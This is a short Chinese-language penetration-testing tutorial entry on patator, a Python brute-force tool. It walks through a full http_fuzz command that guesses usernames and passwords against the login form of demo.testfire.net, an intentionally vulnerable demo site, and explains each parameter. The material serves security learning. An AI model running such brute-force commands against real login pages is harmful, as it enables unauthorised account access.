Day30_渗透 patator

patator
- 使用环境：kali Linux
- 以python写的暴力破解工具。支援多种协定。破解时，须载入对应模组。
  - 破解网页登入帐密
    
    patator http_fuzz url=http://demo.testfire.net/doLogin body="uid=FILE0&passw=FILE1&btnSubmit=Login" method=POST follow=1 accept_cookie=1 persistent=1 before_urls=http://demo.testfire.net/login.jsp 0=/home/kali/user.lst 1=/home/kali/password.lst -x ignore:fgrep="Login Failed"
    
    http_fuzz > 猜解HTTP/HTTPS的登入帐号密码
    url=http://demo.testfire.net/doLogin > 要进行暴力破解的网址
    body="uid=FILE0&passw=FILE1&btnSubmit=Login" > 要传送的栏位内容
    FILE > 传递测试帐号密码的占位符
    method=POST > Request的方法
    follow=1 > 是否会转址。0为不会，1为会
    accept_cookie=1 > 是否保存cookies作为之後request使用。0为不会，1为会
    persistent=1 > 是否要持续连线。0为不会，1为会
    before_urls=http://demo.testfire.net/login.jsp > 针对主要url进行攻击前，先request哪些网址
    -x ignore:fgrep="Login Failed" > 设定当破解结果符合fgrep="Login Failed"，就执行ignore
    ignore > 忽略本笔测试，也不回报结果
    fgrep="Login Failed" > 从回传的资料中比对Login Failed字串